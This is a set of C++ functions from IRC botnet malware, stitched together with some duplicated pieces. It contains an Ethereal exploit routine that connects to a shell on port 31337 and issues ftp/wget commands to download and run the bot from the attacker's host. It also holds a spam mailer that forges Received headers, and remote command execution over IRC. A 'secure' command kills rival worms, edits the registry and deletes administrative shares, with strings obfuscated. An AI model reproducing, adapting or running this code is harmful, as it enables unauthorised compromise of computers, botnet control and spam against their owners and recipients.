bool CScannerEthereal::Exploit() { if(!IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && IsPrivate(m_sSocket.m_szHost)) return false; // We need root to exploit this cause we need to spoof packets if(getuid()) return false; ExploitInt(0); ExploitInt(1); ExploitInt(2); ExploitInt(3); CSocket sShellSocket; if(sShellSocket.Connect(m_sSocket.m_szHost, 31337)) { CString sCmdBuf; sShellSocket.RecvTO(sCmdBuf.GetBuffer(8192), 8192, 2000); sCmdBuf.Format("echo -e open %s %d\\nuser ftp bla\\nget bot\\nquit\\n | ftp -n\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192); sCmdBuf.Format("wget ftp://bla:bla@%s:%d/bot\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192); sCmdBuf.Assign("chmod 777 ./bot ; ./bla\n"); sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192); sShellSocket.Disconnect(); return true; } else return false; }
void CBot::Recv(CMessage *pMsg, bool bInternal) { #ifdef DBGCONSOLE if(pMsg->sDest[0]=='#') g_pMainCtrl->m_cConsDbg.Log(5, "<%s> %s\n", pMsg->sSrc.CStr(), pMsg->sChatString.CStr()); else g_pMainCtrl->m_cConsDbg.Log(5, "*%s* %s\n", pMsg->sSrc.CStr(), pMsg->sChatString.CStr()); #endif if(pMsg->sDest[0]=='#') pMsg->sReplyTo.Assign(pMsg->sDest); else pMsg->sReplyTo.Assign(pMsg->sSrc); if(pMsg->bNotice) pMsg->sReplyTo.Assign(pMsg->sSrc); if(pMsg->bOutchan) { CString sOutchan; sOutchan.Assign(pMsg->sChatString.Mid(pMsg->sChatString.Find(" -o")+3)); pMsg->sReplyTo.Assign(sOutchan); } pMsg->sCmd.Assign(pMsg->sChatString.Token(0, " ").Mid(1)); // Check if its a bot command by comparing the first byte to the bot_prefix value if(pMsg->sChatString[0]==bot_prefix.sValue[0]) { if(!pMsg->sCmd.Compare("bot.repeat")) { if(!pMsg->sChatString.Token(1, " ").Compare("")) return; int i=0, iNum=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iNum) return; CString sNewCStr=pMsg->sChatString.Mid(pMsg->sChatString.Find(' ')); sNewCStr=sNewCStr.Mid(sNewCStr.Find(' ')); pMsg->sChatString.Assign(sNewCStr); pMsg->sCmd.Assign(pMsg->sChatString.Token(0, " ").Mid(1)); if(!bInternal) for(i=0;i<iNum;i++) HandleMsg(pMsg); else for(i=0;i<iNum;i++) HandleMsgInt(pMsg); } else if(!bInternal) HandleMsg(pMsg); else HandleMsgInt(pMsg); } else if(pMsg->sChatString.Token(0, " ").Find(g_pMainCtrl->m_sUserName)) { // botname .command mod - deejayfuzion CString sNewCStr=pMsg->sChatString.Mid(pMsg->sChatString.Find(' ')); pMsg->sChatString.Assign(sNewCStr); pMsg->sCmd.Assign(pMsg->sChatString.Token(0, " ")); this->Recv(pMsg, bInternal); } else { // fallback handler HandleFallBack(pMsg); } }
CString GenerateID() { // E1AOkjD-0001RE-00 CString sID; sID.Assign(" - - "); for(int i=0; i<7; i++) { int iType=brandom(1,3); switch(iType) { case 1: // Uppercase letter sID[i]=brandom(65, 90); break; case 2: // Lowercase letter sID[i]=brandom(97, 122); break; case 3: // Number sID[i]=brandom(48, 57); break; } } for(i=8; i<12; i++) { // Number sID[i]=brandom(48, 57); } for(i=12; i<14; i++) { // Uppercase letter sID[i]=brandom(65, 90); } for(i=15; i<17; i++) { // Number sID[i]=brandom(48, 57); } return CString(""); }
CString TempDirPath(void) { CString result; #ifdef OS_WIN char tmp[MAX_PATH_LENGTH]; if (GetTempPath(MAX_PATH_LENGTH,tmp)) { result.Assign((char*)&tmp); } if (result.IsEmpty()) { result = RootDirPath()+"Temp\\"; } #else result = getenv("TMPDIR"); if (result.IsEmpty()) { result = "/tmp/"; } #endif return result; }
void CBot::Recv(CMessage *pMsg, bool bInternal) { #ifdef DBGCONSOLE if(pMsg->sDest[0]=='#') g_cMainCtrl.m_cConsDbg.Log(5, "<%s> %s\n", pMsg->sSrc.CStr(), pMsg->sChatString.CStr()); else g_cMainCtrl.m_cConsDbg.Log(5, "*%s* %s\n", pMsg->sSrc.CStr(), pMsg->sChatString.CStr()); #endif if(pMsg->sDest[0]=='#') pMsg->sReplyTo.Assign(pMsg->sDest); else pMsg->sReplyTo.Assign(pMsg->sSrc); if(pMsg->bNotice) pMsg->sReplyTo.Assign(pMsg->sSrc); if(pMsg->bOutchan) { CString sOutchan; sOutchan.Assign(pMsg->sChatString.Mid(pMsg->sChatString.Find(" -o")+3)); pMsg->sReplyTo.Assign(sOutchan); } pMsg->sCmd.Assign(pMsg->sChatString.Token(0, " ").Mid(1)); // Check if its a bot command by comparing the first byte to the bot_prefix value if(pMsg->sChatString[0]==bot_prefix.sValue[0]) { if(!pMsg->sCmd.Compare(dp(2,15,20,78,18,5,16,5,1,20,0).CStr()) && g_cMainCtrl.m_cMac.FindLogin(pMsg->sSrc)) { if(!pMsg->sChatString.Token(1, " ").Compare("")) return; int i=0, iNum=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iNum) return; CString sNewCStr=pMsg->sChatString.Mid(pMsg->sChatString.Find(' ')); sNewCStr=sNewCStr.Mid(sNewCStr.Find(' ')); pMsg->sChatString.Assign(sNewCStr); pMsg->sCmd.Assign(pMsg->sChatString.Token(0, " ").Mid(1)); if(!bInternal) for(i=0;i<iNum;i++) HandleMsg(pMsg); else for(i=0;i<iNum;i++) HandleMsgInt(pMsg); } else if(!bInternal) HandleMsg(pMsg); else HandleMsgInt(pMsg); } }
bool CSMTP_Connection::Mail(CString sMailFrom, CString sMailFromFull, CString sRcptTo, CString sSubject, CString sData) { CString sReqBuf, sRecvBuf, sHost, sSrcID, sMTA, sOS; init_random(); m_iMTAType=brandom(MTA_TYPE_UNKNOWN, MTA_TYPE_QMAIL); switch(brandom(1,5)) { case 1: sOS.Assign("Debian"); break; case 2: sOS.Assign("RedHat"); break; case 3: sOS.Assign("SuSE"); break; case 4: sOS.Assign("Slackware"); break; case 5: sOS.Assign("FreeBSD"); break; default: sOS.Assign("Unknown"); break; } switch(m_iMTAType) { case MTA_TYPE_UNKNOWN: { CString sVersionHigh, sVersionLow, sNumber; sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40)); sMTA.Format("SMTP %s.%s (%s)", sVersionHigh.CStr(), sVersionLow.CStr(), sOS.CStr()); } break; case MTA_TYPE_EXIM: { CString sVersionHigh, sVersionLow, sNumber; sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40)); sNumber.Assign(brandom(1, 5)); sMTA.Format("Exim %s.%s #%s (%s)", sVersionHigh.CStr(), sVersionLow.CStr(), sNumber.CStr(), sOS.CStr()); } break; case MTA_TYPE_SENDMAIL: { CString sVersionHigh, sVersionLow, sVersionLow2; sVersionHigh.Assign(brandom(1, 12)); sVersionLow.Assign(brandom(1, 10)); sVersionLow2.Assign(brandom(1, 10)); sMTA.Format("8.%s.%s/8.%s.%s", sVersionHigh.CStr(), sVersionLow.CStr(), sVersionHigh.CStr(), sVersionLow2.CStr()); } break; case MTA_TYPE_QMAIL: { CString sPid; sPid.Assign(brandom(1, 65000)); CString sInvokedBy; int iInvokedBy=brandom(1,3); if(iInvokedBy==1) { sInvokedBy.Assign("alias"); } else if(iInvokedBy==2) { sInvokedBy.Assign("network"); } else if(iInvokedBy==3) { sInvokedBy.Assign("uid 0"); } sMTA.Format("qmail %s invoked by %s", sPid.CStr(), sInvokedBy.CStr()); } break; case MTA_TYPE_GAIA: break; case MTA_TYPE_MSSMTPSVC: break; case MTA_TYPE_MSEXCHANGE: break; case MTA_TYPE_HOTMAILWM: break; case MTA_TYPE_WEBMAIL: break; case MTA_TYPE_POSTFIX: break; case MTA_TYPE_SMTPD: break; case MTA_TYPE_LIST_AMIRC: break; default: #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Invalid MTA type selected!\n", this); #endif // DBGCONSOLE Disconnect(); return false; break; } // Generate an ID CString sID=GenerateID(); sSrcID.Assign(sID); // Get local hostname sHost.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr()); // Send MAIL FROM command sReqBuf.Format("MAIL FROM:<%s>\r\n", sMailFrom.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192); if(sRecvBuf.Mid(0, 3).Compare("250")) { // MAIL FROM failed #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected MAIL FROM \"%s\" (\"%s\")!\n", this, sMailFrom.CStr(), sRecvBuf.Token(0, "\r").CStr()); #endif // DBGCONSOLE Disconnect(); return false; } // Send RCPT TO command sReqBuf.Format("RCPT TO:<%s>\r\n", sRcptTo.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192); if(sRecvBuf.Mid(0, 3).Compare("250")) { // RCPT TO failed #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected RCTP TO \"%s\" (\"%s\")!\n", this, sRcptTo.CStr(), sRecvBuf.Token(0, "\r").CStr()); #endif // DBGCONSOLE Disconnect(); return false; } // Send DATA command sReqBuf.Format("DATA\r\n"); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192); if(sRecvBuf.Mid(0, 3).Compare("354")) { // DATA failed #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected DATA (\"%s\")!\n", this, sRecvBuf.Token(0, "\r").CStr()); #endif // DBGCONSOLE Disconnect(); return false; } // Get local time time_t tGlobal=time(NULL); char szTimeBuf[4096]; strftime(szTimeBuf, sizeof(szTimeBuf), "%a, %d %b %Y %H:%M:%S GMT", gmtime(&tGlobal)); // Clear buffer sReqBuf.Assign(""); switch(m_iMTAType) { case MTA_TYPE_UNKNOWN: sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by "); sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local\r\n"); if(m_bUseSMTPExt) { // id 1AOkjD-0001RE-00 sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n"); // for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // Message-Id: <*****@*****.**> sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n"); } break; case MTA_TYPE_EXIM: // Received: from xxxx by xxxxx.xxxxxxx.xxx with local (Exim 3.36 #1 (Debian)) sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by "); sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(")\r\n"); if(m_bUseSMTPExt) { // id 1AOkjD-0001RE-00 sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n"); // for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // Message-Id: <*****@*****.**> sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n"); } break; case MTA_TYPE_SENDMAIL: // Received: from xxxx by xxxx.xxxxxxx.xxx (8.12.8p1/8.12.6) with local sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by "); sReqBuf.Append(sHost.CStr()); sReqBuf.Append("(8."); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(") with local\r\n"); if(m_bUseSMTPExt) { // id 1AOkjD-0001RE-00 sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n"); // for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // Message-Id: <*****@*****.**> sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n"); } break; case MTA_TYPE_QMAIL: // Received: (qmail 21608 invoked by alias); 17 Jul 2002 14:30:10 -0000 sReqBuf.Append("Received: ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append("); "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); break; case MTA_TYPE_GAIA: break; case MTA_TYPE_MSSMTPSVC: break; case MTA_TYPE_MSEXCHANGE: break; case MTA_TYPE_HOTMAILWM: break; case MTA_TYPE_WEBMAIL: break; case MTA_TYPE_POSTFIX: break; case MTA_TYPE_SMTPD: break; case MTA_TYPE_LIST_AMIRC: break; } // From: xxxx <*****@*****.**> sReqBuf.Append("From: "); sReqBuf.Append(sMailFromFull.CStr()); sReqBuf.Append(" <"); sReqBuf.Append(sMailFrom.CStr()); sReqBuf.Append(">\r\n"); // To: [email protected] sReqBuf.Append("To: "); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append("\r\n"); // Subject: bla sReqBuf.Append("Subject: "); sReqBuf.Append(sSubject.CStr()); sReqBuf.Append("\r\n"); // Date: Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("Date: "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // MIME-Version: 1.0 sReqBuf.Append("MIME-Version: 1.0\r\n"); // if(g_cSMTPLogic.spam_htmlemail.bValue) { // Content-Type: text/html; charset=us-ascii sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n"); // } else { // // Content-Type: text/plain; charset=us-ascii // sReqBuf.Append("Content-Type: text/plain; charset=us-ascii\r\n"); // } sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n"); // Content-Transfer-Encoding: 7bit sReqBuf.Append("Content-Transfer-Encoding: 7bit\r\n"); // // <data> // . // if(g_cSMTPLogic.spam_htmlemail.bValue) { sReqBuf.Append("\r\n\r\n"); // } else { // sReqBuf.Append("\r\n"); // } sReqBuf.Append("\r\n\r\n"); sReqBuf.Append(sData.CStr()); sReqBuf.Append("\r\n.\r\n"); // Send data m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) { // Connection reset #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Connection reset!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // Check if data was accepted if(sRecvBuf.Mid(0, 3).Compare("250")) { // Data not accepted #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected MAIL FROM \"%s\", RCPT TO \"%s\"!\n", this, sMailFrom.CStr(), sRcptTo.CStr()); #endif // DBGCONSOLE Disconnect(); return false; } return true; }
bool CSMTP_Connection::Hello() { CString sReqBuf; CString sRecvBuf; CString sHost; // Get local hostname sHost.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr()); // Send EHLO command sReqBuf.Format("EHLO %s\r\n", sHost.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) { // Connection reset #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Connection reset!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // Check if EHLO was accepted if(sRecvBuf.Mid(0, 3).Compare("250")) { // EHLO not accepted, try HELO (no ESMTP) #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected EHLO, disabling SMTP extensions!\n", this); #endif // DBGCONSOLE // Send HELO command sReqBuf.Format("HELO %s\r\n", sHost.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) { // Connection reset #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Connection reset!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // Check if HELO was accepted if(sRecvBuf.Mid(0, 3).Compare("250")) { // HELO not accepted #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected HELO!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // HELO accepted, disable ESMTP and return true m_bUseSMTPExt=false; return true; } #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Enabled SMTP extensions!\n", this); #endif // DBGCONSOLE // EHLO accepted, enable ESMTP and return true m_bUseSMTPExt=true; return true; }
bool CBot::HandleCommand(CMessage *pMsg) { // ID if(!pMsg->sCmd.Compare(m_cmdId.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); } // Execute else if(!pMsg->sCmd.Compare(m_cmdExecute.sName.CStr())) { CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1; #ifdef WIN32 CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables sText.Assign(sTextExp); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb=sizeof(sinfo); if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE; if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; } #endif return true; } // Remove Bot else if(!pMsg->sCmd.Compare(m_cmdRemove.sName.Str())) { CString sNick(pMsg->sChatString.Token(1, " ", true)); if (!sNick.Compare(g_cMainCtrl.m_sUserName.CStr())) { if(g_cMainCtrl.m_cBot.as_enabled.bValue) g_cMainCtrl.m_cInstaller.RegStartDel(g_cMainCtrl.m_cBot.as_valname.sValue); if(g_cMainCtrl.m_cBot.as_service.bValue) g_cMainCtrl.m_cInstaller.ServiceDel(g_cMainCtrl.m_cBot.as_service_name.sValue); g_cMainCtrl.m_cInstaller.Uninstall(); g_cMainCtrl.m_cIRC.m_bRunning=false; g_cMainCtrl.m_bRunning=false; } } // About else if(!pMsg->sCmd.Compare(m_cmdAbout.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, g_cMainCtrl.m_sNameVerStr.Str(), pMsg->sReplyTo.Str()); } // Flush DNS else if(!pMsg->sCmd.Compare(m_cmdFlushDNS.sName.CStr())) { #ifdef WIN32 // ipconfig.exe /flushdns Execute(dp(9,16,3,15,14,6,9,7,78,5,24,5,0).CStr(), dp(80,6,12,21,19,8,4,14,19,0).CStr()); #endif return true; } // Open File else if(!pMsg->sCmd.Compare(m_cmdOpen.sName.CStr())) { CString sText; sText=pMsg->sChatString.Token(1, " ").CStr(); CString bRet; bRet=(char)ShellExecute( NULL, "open", sText.CStr(), NULL, NULL, SW_SHOWNORMAL ); // bRet=system(sText.CStr())>0; // if(bRet) return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str()); //else return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bRet.Str(), pMsg->sReplyTo.Str()); } // Quit else if(!pMsg->sCmd.Compare(m_cmdQuit.sName.CStr())) { g_cMainCtrl.m_cIRC.m_bRunning=false; return true; } // DNS else if(!pMsg->sCmd.Compare(m_cmdDns.sName.CStr())) { CString sReply; hostent *pHostent=NULL; in_addr iaddr; if(!pMsg->sChatString.Token(1, " ").Compare("")) return false; unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr()); if(addr!=INADDR_NONE) { pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET); if(pHostent) { sReply.Format("%s resolved %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } else { pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr()); if(pHostent) { iaddr=*((in_addr*)*pHostent->h_addr_list); sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr)); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } if(!pHostent) { sReply.Format("resolve.error %s.", pMsg->sChatString.Token(1, " ").CStr()); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } // Random Nickname else if(!pMsg->sCmd.Compare(m_cmdRndNick.sName.CStr())) { CString sRndNick=RndNick(si_nickprefix.sValue.CStr()); g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), sRndNick.CStr()); g_cMainCtrl.m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr()); return true; } // Run Command else if(!pMsg->sCmd.Compare(m_cmdCommand.sName.CStr())) { #ifdef WIN32 if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false; CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false; CString sReplyBuf; sReplyBuf.Format("Executed: %s.", sText.CStr()); if(system(sText.CStr())==-1) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; } else { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; } #endif return true; } // System Information else if(!pMsg->sCmd.Compare(m_cmdSysInfo.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); } // Find Files //else if(!pMsg->sCmd.Compare(m_cmdFindFiles.sName.CStr())) // { /* CString strMask = pMsg->sChatString.Token(1, " "); CString strDir = pMsg->sChatString.Token(2, " "); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, FindFiles(strMask, strDir), pMsg->sReplyTo.Str()); */ //} // Change Nickname else if(!pMsg->sCmd.Compare(m_cmdNick.sName.CStr())) { g_cMainCtrl.m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr()); g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), g_cMainCtrl.m_sUserName.CStr()); return true; } // Uptime check (default: 7d) else if(!pMsg->sCmd.Compare(m_cmdLongUptime.sName.CStr())) { int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iDays) iDays=7; CString sUptime=LongUptime(iDays); if(sUptime.Compare("")) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ sUptime.Str(), pMsg->sReplyTo.Str()); } return true; } // Secure Bot else if(!pMsg->sCmd.Compare(m_cmdSecure.sName.CStr())) { #ifdef WIN32 CString regLoc; regLoc = dp(45,15,6,20,23,1,18,5,80,39,9,3,18,15,19,15,6,20,80,49,9,14,4,15,23,19,80,29,21,18,18,5,14,20,48,5,18,19,9,15,14,80,44,21,14,0).CStr(); HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128]; strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, dp(31,14,1,2,12,5,30,29,41,39,0).CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(45,19,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(9,18,21,14,72,78,5,24,5,0).CStr()); CString tmpBagle; GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(9,18,21,14,72,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(18,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(),dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(19,19,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(23,9,14,19,25,19,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(23,9,14,19,25,19,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(4,71,4,21,16,4,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(46,1,19,11,39,15,14,0).CStr()); RegCloseKey(hkey); KillProcess(dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(31,24,16,12,15,18,5,18,0).CStr()); RegCloseKey(hkey); system("net share c$ /delete /y"); system("net share d$ /delete /y"); system("net share ipc$ /delete /y"); system("net share admin$ /delete /y"); #endif return true; } return false; }
